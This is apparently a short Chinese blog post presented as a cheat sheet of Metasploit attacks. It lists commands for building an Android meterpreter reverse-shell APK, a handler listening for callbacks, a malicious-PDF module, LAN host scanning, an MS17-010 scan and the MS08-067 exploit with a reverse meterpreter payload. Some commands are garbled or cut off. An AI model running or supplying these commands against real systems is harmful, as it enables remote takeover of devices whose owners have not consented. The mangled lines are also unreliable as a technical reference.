metasploit所有攻击方式(干货)

metasploit安卓渗透

msfvenom -p android/meterpreter/reverse_tcp LHOST=........ LPORT=4444 R> /sdcard/hack,apk
use exploit/multi/handler
set payload android/meterpreter/reverse_tcp
set LHOST 192.168.18.250
set LPORT 12345
exploit
use exploit/windows/fileformat/adobe_cooltype_sing  LHOST  LPORT R> /sdcard/pdf.pdf

利用Metasploit进行局域网活动主机扫描
msf > use auxiliary/scanner/discovery/arp_sweep
msf > show options
msf  auxiliary(arp_sweep) > set RHOSTS 192.168.0.0/24  /*设置目标IP 此处扫描192.168.0网段的所   
msf  auxiliary(arp_sweep) > set THREADS 50   /*设置线程  */
内网扫描存在ms17010漏洞
auxiliary/scanner/smb/smb_ms17_010

缓冲区溢出漏洞win xp sp3
use exploit/windows/smb/ms08_067_netapi 
set payload windows/meterpreter/reverse_tcp

ms12042存在与Windows xp和Windows server 2003的所有32位版本、及Windows 7(由于基于x64的系统)以及Windows server 2008 R2 x64
该漏洞是Windows 内核中的漏洞,可能允许特权提升,Window

你可能感兴趣的:(metasploit,MSF,安全)